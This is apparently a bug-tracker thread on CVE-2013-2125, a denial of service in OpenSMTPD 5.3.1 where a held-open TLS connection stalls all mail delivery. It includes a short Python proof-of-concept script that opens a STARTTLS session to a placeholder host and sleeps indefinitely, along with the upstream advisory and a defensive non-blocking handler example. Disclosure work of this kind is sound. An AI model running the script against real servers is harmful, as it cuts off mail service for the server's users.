From ${URL} :

The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its sockets in blocking mode, allowing an attacker to prevent all mail delivery simply by holding a socket open. I discovered this accidentally, as I noticed my HP printer's smtp client would keep the connection indefinitely open after an unsuccessful authentication attempt, causing no more mail to be delivered until I SIGKILL'd my smtpd process or unplugged my printer. The following reproduces the attack trivially:

    #!/usr/bin/env python2
    import smtplib
    import time

    print "[+] Connecting to server and initiating TLS"
    smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
    smtp.starttls()
    print "[+] No clients will be able to connect as long as this remains open."
    time.sleep(100000000)

Apparently this was fixed recently upstream, noting "evil client" in the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0

A snapshot has been posted to http://www.opensmtpd.org/archives/ , but no patch release has yet been made.

@maintainer(s): after the bump, in case we need to stabilize the package, please say explicitly if it is ready for the stabilization or not.
CVE-2013-2125 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2125): OpenSMTPD before 5.3.2 does not properly handle SSL sessions, which allows remote attackers to cause a denial of service (connection blocking) by keeping a connection open.
As per the opensmtpd page this looks to be fixed in version:

OpenSMTPD 5.3.1 Security Advisories

These are the OpenSMTPD 5.3.1 advisories -- all these problems are solved in our repository as well as in newer snapshots and releases.

May 16, 2013: OpenSMTPD's SSL layer has a bug in the IO events handler which can cause an evil client or server to hang all active SSL sessions until they timeout, causing a DoS in smtp and transfer processes.

https://www.opensmtpd.org/security.html

Closing the bug as resolved as we do not have earlier versions in tree other than 5.4.1. If I am mistaken please advise and we will address.

Adding to master GLSA for 2013.
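The defect the report and the advisory describe is an SSL I/O event handler that performs a blocking read once the event loop says the fd is readable, so a single silent or slow client (the reporter's printer) parks the process and every other session with it. The following is an added example, not the reporter's PoC and not OpenSMTPD code, of the non-blocking handler shape that avoids this, using a constructed 2-byte length-prefixed framing in place of TLS records and a select() loop; `Session`, `frame` and `serve_once` are names chosen for this illustration.

```python
import select
import time

HDR = 2  # constructed framing: 2-byte big-endian length, then payload (stands in for a TLS record)

def frame(payload):
    """Encode one record in the constructed framing."""
    return len(payload).to_bytes(HDR, "big") + payload

class Session:
    """Per-connection state that survives between event-loop turns."""
    def __init__(self, sock, idle_timeout=30.0, now=time.monotonic):
        sock.setblocking(False)      # the fix: a read can never park the whole process
        self.sock, self.buf, self.closed = sock, b"", False
        self.now, self.idle_timeout = now, idle_timeout
        self.last_activity = now()

    def on_readable(self):
        """Run when select() says the fd is readable. Readable means *some* bytes arrived,
        not a whole record: drain what the kernel has and buffer any partial record."""
        try:
            chunk = self.sock.recv(65536)
        except BlockingIOError:
            return []                # spurious wakeup; back to the loop
        if not chunk:
            self.closed = True       # peer went away
            return []
        self.buf += chunk
        self.last_activity = self.now()
        records = []
        while len(self.buf) >= HDR:
            n = int.from_bytes(self.buf[:HDR], "big")
            if len(self.buf) < HDR + n:
                break                # partial record: finish it on a later turn
            records.append(self.buf[HDR:HDR + n])
            self.buf = self.buf[HDR + n:]
        return records

    def expired(self):
        """Non-blocking reads keep the loop alive; the idle timeout is what frees a silent peer's slot."""
        return self.closed or self.now() - self.last_activity > self.idle_timeout

def serve_once(sessions, timeout=0.0):
    """One turn of the event loop over every session: returns the records each
    readable socket delivered and the sessions that should now be dropped."""
    by_sock = {s.sock: s for s in sessions}
    readable, _, _ = select.select(list(by_sock), [], [], timeout)
    delivered = {sock: by_sock[sock].on_readable() for sock in readable}
    return delivered, [s for s in sessions if s.expired()]
```

A peer that sends half a record, or nothing at all after connecting, costs the loop one short turn rather than stalling it; the idle timeout then evicts it.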